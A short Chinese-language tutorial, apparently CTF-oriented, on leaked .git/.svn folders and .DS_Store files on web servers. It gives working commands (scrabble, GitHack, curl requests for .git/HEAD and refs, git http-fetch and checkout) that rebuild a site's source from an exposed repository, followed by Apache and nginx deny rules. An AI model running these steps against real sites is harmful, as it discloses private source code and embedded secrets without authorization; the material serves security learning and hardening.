有些工程師開發網站的時候沒有注意到自己把敏感資料一起放在網路上了,
今天來看看這些「不小心」吧!
如果公司有進行版本控制系統如 git , svn
這時候要小心有沒有把 .git 或 .svn 一起部屬在線上環境上
使用我們神奇小工具─scrabble,GitHack
這兩個工具都可以幫助我們復原 .git 資料夾
scrabbble 使用方式scrabble http://<目標 IP 或網站>/
GitHack 使用方式GitHack.py http://<目標 IP 或網站>/.git/
curl http://<目標 IP 或網站>/.git/
curl http://<目標 IP 或網站>/.git/HEAD
curl http://<目標 IP 或網站>/.git/refs/heads/master
# 53eb21e4b8098bdf094374983b5a35b7213383e0
git init
git http-fetch -a 53eb21e4b8098bdf094374983b5a35b7213383e0 http://<目標IP>/.git/
ls -la
git checkout 53eb21e4b8098bdf094374983b5a35b7213383e0
ls -lat
# 查看內容
git log
git log -p
# you got flag!
取回原始碼會怎麼樣?
.DS_Store
小建議
cd /var/www/ #任何你放 web 資料的地方
find . -type f -iname "*.DS_Store*"
httpd.conf
<Files ~ "\.DS_Store$">
Order allow,deny
Deny from all
</Files>
location ~ \.DS_Store$ {
deny all;
}